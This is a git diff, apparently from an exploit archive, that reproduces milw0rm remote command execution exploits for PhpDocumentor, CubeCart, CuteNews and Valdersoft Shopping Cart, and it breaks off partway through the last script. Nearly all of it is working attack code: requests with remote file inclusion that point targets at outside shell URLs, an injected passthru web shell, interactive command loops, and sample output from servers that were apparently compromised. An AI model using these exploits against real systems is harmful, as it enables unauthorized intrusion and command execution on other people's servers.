@@ -1,214 +1,214 @@
-**PhpDocumentor <= 1.3.0 rc4 remote commands execution**
-
-

-**PhpDocumentor <= 1.3.0 rc4 remote commands execution**
a
-script  by  rgod  at        
-http://rgod.altervista.org
  
           
 * hostname (ex:www.sitename.com)
-
 
  * path (ex:
-/phpdocumentor/  or just / ) 
   * specify a command     
    
    * remote location ( ex: http://www.somesite
-.com, without traling slashes)
specify  a  port other than  80 (default value) 
   

-send  exploit  through  an
-HTTP proxy (ip:port) 
 
          
';
-
-function show($headeri)
-{
-  $ii=0;$ji=0;$ki=0;$ci=0;
-  echo '';
-  while ($ii <= strlen($headeri)-1){
-    $datai=dechex(ord($headeri[$ii]));
-    if ($ji==16) {
-      $ji=0;
-      $ci++;
-      echo "";
-      for ($li=0; $li<=15; $li++) {
-        echo "";
-		}
-      $ki=$ki+16;
-      echo "";
-    }
-    if (strlen($datai)==1) {
-      echo "";
-    }
-    else {
-      echo " ";
-    }
-    $ii++;$ji++;
-  }
-  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
-    echo "";
-  }
-  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
-    echo "";
-  }
-  echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
";
-}
-
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-
-function sendpacket() //2x speed
-{
-  global $proxy, $host, $port, $packet, $html, $proxy_regex;
-  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
-  if ($socket < 0) {
-    echo "socket_create() failed: reason: " . socket_strerror($socket) . "
";
-  }
-  else {
-    $c = preg_match($proxy_regex,$proxy);
-    if (!$c) {echo 'Not a valid prozy...';
-    die;
-    }
-  echo "OK.
";
-  echo "Attempting to connect to ".$host." on port ".$port."...
";
-  if ($proxy=='') {
-    $result = socket_connect($socket, $host, $port);
-  }
-  else {
-    $parts =explode(':',$proxy);
-    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
-    $result = socket_connect($socket, $parts[0],$parts[1]);
-  }
-  if ($result < 0) {
-    echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

";
-  }
-  else {
-    echo "OK.

";
-    $html= '';
-    socket_write($socket, $packet, strlen($packet));
-    echo "Reading response:
";
-    while ($out= socket_read($socket, 2048)) {$html.=$out;}
-    echo nl2br(htmlentities($html));
-    echo "Closing socket...";
-    socket_close($socket);
-  }
-  }
-}
-
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.htmlentities($host); die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid prozy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);echo nl2br(htmlentities($html));
-}
-
-$host=$_POST[host];$path=$_POST[path];
-$port=$_POST[port]; $CMD=$_POST[CMD];
-$LOCATION=$_POST[LOCATION];
-
-
-if (($host<>'') and ($path<>'') and ($CMD<>'') and ($LOCATION<>''))
-{
-  $port=intval(trim($port));
-  if ($port=='') {$port=80;}
-  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
-  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-  $host=str_replace("\r\n","",$host);
-  $path=str_replace("\r\n","",$path);
-  $CMD=urlencode($CMD);
-
-  $packet="GET ".$p."Documentation/tests/bug-559668.php?cmd=".$CMD."&FORUM[LIB]=".$LOCATION." HTTP/1.1\r\n";
-  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  show($packet);
-  sendpacketii($packet);
-  if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; die;}
-                           else {echo "Trying Step 2...
";}
-
-  $packet="GET ".$p."docbuilder/file_dialog.php?cmd=".$CMD."&root_dir=".$LOCATION." HTTP/1.1\r\n";
-  $packet.="User-Agent: SnoopRob/x.x\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  show($packet);
-  sendpacketii($packet);
-  if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; }
-                           else {echo "Exploit failed...";}
-}
-else
-{echo "Note: on remote location prepare this code in

-        http:/[remote_location]/classes/db/PearDb.php/index.html

-        and in

-        http://[remote_location]/phpDocumentor/common.inc.php/index.html:
";
- echo  nl2br(htmlentities("
-        
-        "));
-  echo "
Note 2: if magic_quotes_off on target server

-        you can truncate location name with a null char, ex.:

-        http://[remote_location]/your_file.txt%00


-        Fill * required fields, optionally specify a proxy...";}
-
-?>
-
-# milw0rm.com [2005-12-29]
+**PhpDocumentor <= 1.3.0 rc4 remote commands execution**
+
+

+**PhpDocumentor <= 1.3.0 rc4 remote commands execution**
a
+script  by  rgod  at        
+http://rgod.altervista.org
  
           
 * hostname (ex:www.sitename.com)
+
 
  * path (ex:
+/phpdocumentor/  or just / ) 
   * specify a command     
    
    * remote location ( ex: http://www.somesite
+.com, without traling slashes)
specify  a  port other than  80 (default value) 
   

+send  exploit  through  an
+HTTP proxy (ip:port) 
 
          
';
+
+function show($headeri)
+{
+  $ii=0;$ji=0;$ki=0;$ci=0;
+  echo '';
+  while ($ii <= strlen($headeri)-1){
+    $datai=dechex(ord($headeri[$ii]));
+    if ($ji==16) {
+      $ji=0;
+      $ci++;
+      echo "";
+      for ($li=0; $li<=15; $li++) {
+        echo "";
+		}
+      $ki=$ki+16;
+      echo "";
+    }
+    if (strlen($datai)==1) {
+      echo "";
+    }
+    else {
+      echo " ";
+    }
+    $ii++;$ji++;
+  }
+  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
+    echo "";
+  }
+  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
+    echo "";
+  }
+  echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
";
+}
+
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+
+function sendpacket() //2x speed
+{
+  global $proxy, $host, $port, $packet, $html, $proxy_regex;
+  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+  if ($socket < 0) {
+    echo "socket_create() failed: reason: " . socket_strerror($socket) . "
";
+  }
+  else {
+    $c = preg_match($proxy_regex,$proxy);
+    if (!$c) {echo 'Not a valid prozy...';
+    die;
+    }
+  echo "OK.
";
+  echo "Attempting to connect to ".$host." on port ".$port."...
";
+  if ($proxy=='') {
+    $result = socket_connect($socket, $host, $port);
+  }
+  else {
+    $parts =explode(':',$proxy);
+    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
+    $result = socket_connect($socket, $parts[0],$parts[1]);
+  }
+  if ($result < 0) {
+    echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

";
+  }
+  else {
+    echo "OK.

";
+    $html= '';
+    socket_write($socket, $packet, strlen($packet));
+    echo "Reading response:
";
+    while ($out= socket_read($socket, 2048)) {$html.=$out;}
+    echo nl2br(htmlentities($html));
+    echo "Closing socket...";
+    socket_close($socket);
+  }
+  }
+}
+
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.htmlentities($host); die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid prozy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);echo nl2br(htmlentities($html));
+}
+
+$host=$_POST[host];$path=$_POST[path];
+$port=$_POST[port]; $CMD=$_POST[CMD];
+$LOCATION=$_POST[LOCATION];
+
+
+if (($host<>'') and ($path<>'') and ($CMD<>'') and ($LOCATION<>''))
+{
+  $port=intval(trim($port));
+  if ($port=='') {$port=80;}
+  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
+  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+  $host=str_replace("\r\n","",$host);
+  $path=str_replace("\r\n","",$path);
+  $CMD=urlencode($CMD);
+
+  $packet="GET ".$p."Documentation/tests/bug-559668.php?cmd=".$CMD."&FORUM[LIB]=".$LOCATION." HTTP/1.1\r\n";
+  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  show($packet);
+  sendpacketii($packet);
+  if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; die;}
+                           else {echo "Trying Step 2...
";}
+
+  $packet="GET ".$p."docbuilder/file_dialog.php?cmd=".$CMD."&root_dir=".$LOCATION." HTTP/1.1\r\n";
+  $packet.="User-Agent: SnoopRob/x.x\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  show($packet);
+  sendpacketii($packet);
+  if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; }
+                           else {echo "Exploit failed...";}
+}
+else
+{echo "Note: on remote location prepare this code in

+        http:/[remote_location]/classes/db/PearDb.php/index.html

+        and in

+        http://[remote_location]/phpDocumentor/common.inc.php/index.html:
";
+ echo  nl2br(htmlentities("
+        
+        "));
+  echo "
Note 2: if magic_quotes_off on target server

+        you can truncate location name with a null char, ex.:

+        http://[remote_location]/your_file.txt%00


+        Fill * required fields, optionally specify a proxy...";}
+
+?>
+
+# milw0rm.com [2005-12-29]
diff --git a/platforms/php/webapps/1398.pl b/platforms/php/webapps/1398.pl
index fe3dfc999..6ccfb1e0b 100755
--- a/platforms/php/webapps/1398.pl
+++ b/platforms/php/webapps/1398.pl
@@ -1,126 +1,126 @@
-#!/usr/bin/perl
-#
-# cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer 
-# All rights reserved.           
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d
-# [cijfer@www.xxx.com /]$ id;uname -a
-# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
-# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
-#
-# [cijfer@www.xxx.com /]$
-#
-## 2. explanation
-#
-# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
-# can remotely execute arbitrary commands via 'includes/orderSuccess.inc.php' where  
-# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
-# passing input to the 'glob[rootDir]' variable, and include a remote execution script
-# to execute arbitrary commands. as usual, this requires 'register_globals' to be
-# enabled in order to successfully do this, otherwise a 403 error will show.
-#
-## 3. the bug
-#
-# this below allows us to bypass the 403 error...
-#
-#       
-#
-## 5. the greets
-#
-# kippis to Zodiac, felosi, and odz. also shouts to lethal & hexy
-#
-##
-#
-# $Id: cijfer-ccxpl.pl,v 0.2 2005/12/30 06:02:00 cijfer Exp cijfer $
-
-use Getopt::Std;
-use IO::Socket;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$shel = "http://website.com/cmd.txt";    # cmd shell url
-$cmdv = "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);)
-$good = 0;
-
-if(!$host||!$dirs)
-{
-        print "cijfer-ccxpl.pl by cijfer\n";
-        print "usage: $0 -h cijfer.xxx -d /cubecart\r\n";
-        print "usage: $0 -h  -d \r\n";
-        exit();
-}
-
-while()
-{
-        print "[cijfer@".$host." /]\$ ";
-        while()
-        {
-                $cmds=$_;
-                chomp($cmds);
-                last;
-        }
-
-        $string  = $dirs;
-        $string .= "/includes/orderSuccess.inc.php?";
-        $string .= uri_escape($cmdv);
-        $string .= "=";
-        $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
-        $string .= uri_escape($cmds).";echo";
-        $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
-        $string .= "&glob=1&cart_order_id=1&glob[rootDir]=";
-        $string .= $shel;
-        $string .= "?";
-
-        $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-        print $sock "GET $string HTTP/1.1\n";
-        print $sock "Host: $host\n";
-        print $sock "Accept: */*\n";
-        print $sock "Connection: close\n\n";
-
-        while($result = <$sock>)
-        {
-                if($result =~ /^_END_/)
-                {
-                        $good=0;
-                }
-
-                if($good==1)
-                {
-                        print $result;
-                }
-
-                if($result =~ /^_START_/)
-                {
-                        $good=1;
-                }
-        }
-}
-
-# milw0rm.com [2005-12-30]
+#!/usr/bin/perl
+#
+# cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit
+#
+# Copyright (c) 2005 cijfer 
+# All rights reserved.           
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d
+# [cijfer@www.xxx.com /]$ id;uname -a
+# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
+# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
+#
+# [cijfer@www.xxx.com /]$
+#
+## 2. explanation
+#
+# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
+# can remotely execute arbitrary commands via 'includes/orderSuccess.inc.php' where  
+# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
+# passing input to the 'glob[rootDir]' variable, and include a remote execution script
+# to execute arbitrary commands. as usual, this requires 'register_globals' to be
+# enabled in order to successfully do this, otherwise a 403 error will show.
+#
+## 3. the bug
+#
+# this below allows us to bypass the 403 error...
+#
+#       
+#
+## 5. the greets
+#
+# kippis to Zodiac, felosi, and odz. also shouts to lethal & hexy
+#
+##
+#
+# $Id: cijfer-ccxpl.pl,v 0.2 2005/12/30 06:02:00 cijfer Exp cijfer $
+
+use Getopt::Std;
+use IO::Socket;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$shel = "http://website.com/cmd.txt";    # cmd shell url
+$cmdv = "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);)
+$good = 0;
+
+if(!$host||!$dirs)
+{
+        print "cijfer-ccxpl.pl by cijfer\n";
+        print "usage: $0 -h cijfer.xxx -d /cubecart\r\n";
+        print "usage: $0 -h  -d \r\n";
+        exit();
+}
+
+while()
+{
+        print "[cijfer@".$host." /]\$ ";
+        while()
+        {
+                $cmds=$_;
+                chomp($cmds);
+                last;
+        }
+
+        $string  = $dirs;
+        $string .= "/includes/orderSuccess.inc.php?";
+        $string .= uri_escape($cmdv);
+        $string .= "=";
+        $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
+        $string .= uri_escape($cmds).";echo";
+        $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
+        $string .= "&glob=1&cart_order_id=1&glob[rootDir]=";
+        $string .= $shel;
+        $string .= "?";
+
+        $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+        print $sock "GET $string HTTP/1.1\n";
+        print $sock "Host: $host\n";
+        print $sock "Accept: */*\n";
+        print $sock "Connection: close\n\n";
+
+        while($result = <$sock>)
+        {
+                if($result =~ /^_END_/)
+                {
+                        $good=0;
+                }
+
+                if($good==1)
+                {
+                        print $result;
+                }
+
+                if($result =~ /^_START_/)
+                {
+                        $good=1;
+                }
+        }
+}
+
+# milw0rm.com [2005-12-30]
diff --git a/platforms/php/webapps/1400.pl b/platforms/php/webapps/1400.pl
index 70c18b05a..efe894cbf 100755
--- a/platforms/php/webapps/1400.pl
+++ b/platforms/php/webapps/1400.pl
@@ -1,163 +1,163 @@
-#!/usr/bin/perl
-#
-# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
-#
-# Copyright (c) 2005 cijfer 
-# All rights reserved.           
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
-# [cijfer@www.xxxx.org /]$ id;uname -a
-# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
-# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
-# [cijfer@www.xxxx.org /]$
-#
-## 2. explanation
-#
-# this particular vulnerability is already known (sort of). a
-# bug as exact as this one was found by rgod in CuteNews. the
-# sole difference between his and my bug, are the files that
-# are being exploited. while his was a bug using the following
-# string:
-#
-#	show_archives.php?template=../inc/ipban.mdu%00
-#
-# i found my bug in:
-#
-#	show_archives.php?template=../inc/categories.mdu%00
-#
-## 3. the bug
-#
-# the bug lies in categories.mdu, located in the /inc/ folder
-# of the cutenews directory.
-#
-# by using the 'template' variable in show_archives.php, we
-# can include any local files. in this case, we're including
-# categories.mdu. why? every .mdu file within the cutenews 
-# package has raw PHP code within it, that is not protected
-# like the normal .php files.
-#
-# $template gets sanitized, but can be bypassed depending on
-# php configuration! this is why on some 1.4.0's it works and
-# on some others it does not. it all depends on configuration
-# and whether or not register_globals needs to be on.
-#
-# 	if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
-#       ...
-#
-# looking into categories.mdu, we notice the following to
-# create our exploit string:
-#
-# 	if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
-#       ... 
-#
-#	elseif($action == "doedit")
-# 	{
-#       ...
-#
-# cannot write arbitrary php code to $cat_name :(
-#
-#	$cat_name = htmlspecialchars(stripslashes($cat_name)); 
-#       ...
-#
-# $cat_icon lacks sanitization :))!
-#
-#	fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
-#       ...
-#
-# adding together all these elements, it is possible to inject
-# php code into data/category.db.php and from there, use our
-# injected code to either include a remote php shell, or run
-# commands on the system.
-#
-##
-#
-# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
-
-use IO::Socket;
-use Getopt::Std;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$good = 0;
-
-if(!$host)
-{
-	print "cijfer-cnxpl.pl by cijfer\n";
-        print "usage: $0 -h  -d [/directory]\r\n";
-        exit();
-}
-
-while()
-{
-	print "[cijfer@".$host." /]\$ ";
-	while()
-	{
-		$cmds=$_;
-		chomp($cmds);
-		last;
-	}
-
-if(!$dirs)
-{
-	$dirs = "/cutenews";
-}
-
-$string  = $dirs;
-$string .= "/show_archives.php?template=../inc/categories.mdu%00";
-$string .= "&member_db[1]=1";
-$string .= "&action=doedit";                                #can be changed from 'doedit' to 'add' if no categories exist
-$string .= "&cat_name=cijfer";
-$string .= "&catid=1";                                      #can be changed to different value if starting catid != 0
-$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
-
-$cijfer  = $dirs;
-$cijfer .= "/data/category.db.php?cij=";
-$cijfer .= uri_escape("echo; ");
-$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
-$cijfer .= uri_escape($cmds);
-$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F";          # _END_
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-print $sock "GET $string HTTP/1.1\n";
-print $sock "Host: $host\n";
-print $sock "Accept: */*\n";
-print $sock "Connection: close\n\n";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-print $sock "GET $cijfer HTTP/1.1\n";
-print $sock "Host: $host\n";
-print $sock "Accept: */*\n";
-print $sock "Connection: close\n\n";
-
-while($result = <$sock>)
-{
-	if($sock =~ /^403/)
-	{
-		print "error: 403\n";
-		exit();
-	}
-	if($result =~ /^_END_/)
-	{
-		$good=0;
-	}
-
-	if($good==1)
-	{
-        	print $result;
-	}
-
-	if($result =~ /^_START_/)
-	{
-		$good=1;
-	}
-}
-}
-
-# milw0rm.com [2006-01-01]
+#!/usr/bin/perl
+#
+# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
+#
+# Copyright (c) 2005 cijfer 
+# All rights reserved.           
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
+# [cijfer@www.xxxx.org /]$ id;uname -a
+# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
+# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
+# [cijfer@www.xxxx.org /]$
+#
+## 2. explanation
+#
+# this particular vulnerability is already known (sort of). a
+# bug as exact as this one was found by rgod in CuteNews. the
+# sole difference between his and my bug, are the files that
+# are being exploited. while his was a bug using the following
+# string:
+#
+#	show_archives.php?template=../inc/ipban.mdu%00
+#
+# i found my bug in:
+#
+#	show_archives.php?template=../inc/categories.mdu%00
+#
+## 3. the bug
+#
+# the bug lies in categories.mdu, located in the /inc/ folder
+# of the cutenews directory.
+#
+# by using the 'template' variable in show_archives.php, we
+# can include any local files. in this case, we're including
+# categories.mdu. why? every .mdu file within the cutenews 
+# package has raw PHP code within it, that is not protected
+# like the normal .php files.
+#
+# $template gets sanitized, but can be bypassed depending on
+# php configuration! this is why on some 1.4.0's it works and
+# on some others it does not. it all depends on configuration
+# and whether or not register_globals needs to be on.
+#
+# 	if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
+#       ...
+#
+# looking into categories.mdu, we notice the following to
+# create our exploit string:
+#
+# 	if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
+#       ... 
+#
+#	elseif($action == "doedit")
+# 	{
+#       ...
+#
+# cannot write arbitrary php code to $cat_name :(
+#
+#	$cat_name = htmlspecialchars(stripslashes($cat_name)); 
+#       ...
+#
+# $cat_icon lacks sanitization :))!
+#
+#	fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
+#       ...
+#
+# adding together all these elements, it is possible to inject
+# php code into data/category.db.php and from there, use our
+# injected code to either include a remote php shell, or run
+# commands on the system.
+#
+##
+#
+# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
+
+use IO::Socket;
+use Getopt::Std;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$good = 0;
+
+if(!$host)
+{
+	print "cijfer-cnxpl.pl by cijfer\n";
+        print "usage: $0 -h  -d [/directory]\r\n";
+        exit();
+}
+
+while()
+{
+	print "[cijfer@".$host." /]\$ ";
+	while()
+	{
+		$cmds=$_;
+		chomp($cmds);
+		last;
+	}
+
+if(!$dirs)
+{
+	$dirs = "/cutenews";
+}
+
+$string  = $dirs;
+$string .= "/show_archives.php?template=../inc/categories.mdu%00";
+$string .= "&member_db[1]=1";
+$string .= "&action=doedit";                                #can be changed from 'doedit' to 'add' if no categories exist
+$string .= "&cat_name=cijfer";
+$string .= "&catid=1";                                      #can be changed to different value if starting catid != 0
+$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
+
+$cijfer  = $dirs;
+$cijfer .= "/data/category.db.php?cij=";
+$cijfer .= uri_escape("echo; ");
+$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
+$cijfer .= uri_escape($cmds);
+$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F";          # _END_
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+print $sock "GET $string HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: */*\n";
+print $sock "Connection: close\n\n";
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+print $sock "GET $cijfer HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: */*\n";
+print $sock "Connection: close\n\n";
+
+while($result = <$sock>)
+{
+	if($sock =~ /^403/)
+	{
+		print "error: 403\n";
+		exit();
+	}
+	if($result =~ /^_END_/)
+	{
+		$good=0;
+	}
+
+	if($good==1)
+	{
+        	print $result;
+	}
+
+	if($result =~ /^_START_/)
+	{
+		$good=1;
+	}
+}
+}
+
+# milw0rm.com [2006-01-01]
diff --git a/platforms/php/webapps/1401.pl b/platforms/php/webapps/1401.pl
index b24031f07..c3973097d 100755
--- a/platforms/php/webapps/1401.pl
+++ b/platforms/php/webapps/1401.pl
@@ -1,111 +1,111 @@
-#!/usr/bin/perl
-#
-# cijfer-vscxpl - Valdersoft Shopping Cart <=3.0 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer 
-# All rights reserved.           
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store
-# [cijfer@www.valdersoft.com /]$ id;uname -a
-# uid=2526(apache) gid=2524(apache) groups=2524(apache), 10004(psaserv)
-# FreeBSD valdersoft.com 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Wed Nov 19 00:35:22 EST 2003     
-# tim@temp.atlnetworks.com:/usr/src/sys/compile/PLESK  i386
-# 
-# [cijfer@www.valdersoft.com /]$ 
-#
-## 2. explanation
-#
-# various files within 'include\templates\categories' contains unsanitized and undefined
-# variables which can allow remote file inclusion, leading to remote command execution.
-# this can be done by entering a remote url within the 'catalogDocumentRoot' variable.
-#
-## 3. the bug
-#
-# this is obvious _why_ it is dangerous.
-#
-#       ...
-#       include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");
-#       ...
-#
-## 4. the php shell
-#
-# this exploit grabs data via regular expression strings. foreign php shell
-# scripts will not work with this exploit. use the following code along with
-# this exploit and put it in 'cmd.txt' or whatever you please:
-#
-#       
-#
-##
-#
-# $Id: cijfer-vscxpl.pl,v 0.2 2005/12/30 11:44:00 cijfer Exp cijfer $
-
-use Getopt::Std;
-use IO::Socket;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$shel = "http://site.com/cmd.txt";       # cmd shell url
-$cmdv = "cmd";                           # cmd variable (ex. passthru($_GET[cmd]);)
-$good = 0;
-
-if(!$host||!$dirs)
-{
-        print "cijfer-vscxpl.pl by cijfer\n";
-        print "usage: $0 -h cijfer.xxx -d /valdersoft\r\n";
-        print "usage: $0 -h  -d \r\n";
-        exit();
-}
-
-while()
-{
-        print "[cijfer@".$host." /]\$ ";
-        while()
-        {
-                $cmds=$_;
-                chomp($cmds);
-                last;
-        }
-
-        $string  = $dirs;
-        $string .= "/include/templates/categories/default.php?";
-        $string .= uri_escape($cmdv);
-        $string .= "=";
-        $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
-        $string .= uri_escape($cmds).";echo";
-        $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
-        $string .= "&catalogDocumentRoot=";
-        $string .= $shel;
-        $string .= "?";
-
-        $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-        print $sock "GET $string HTTP/1.1\n";
-        print $sock "Host: $host\n";
-        print $sock "Accept: */*\n";
-        print $sock "Connection: close\n\n";
-
-        while($result = <$sock>)
-        {
-                if($result =~ /^_END_/)
-                {
-                        $good=0;
-                }
-
-                if($good==1)
-                {
-                        print $result;
-                }
-
-                if($result =~ /^_START_/)
-                {
-                        $good=1;
-                }
-        }
-}
-
-# milw0rm.com [2006-01-03]
+#!/usr/bin/perl
+#
+# cijfer-vscxpl - Valdersoft Shopping Cart <=3.0 Remote Command Execution Exploit
+#
+# Copyright (c) 2005 cijfer 
+# All rights reserved.           
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store
+# [cijfer@www.valdersoft.com /]$ id;uname -a
+# uid=2526(apache) gid=2524(apache) groups=2524(apache), 10004(psaserv)
+# FreeBSD valdersoft.com 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Wed Nov 19 00:35:22 EST 2003     
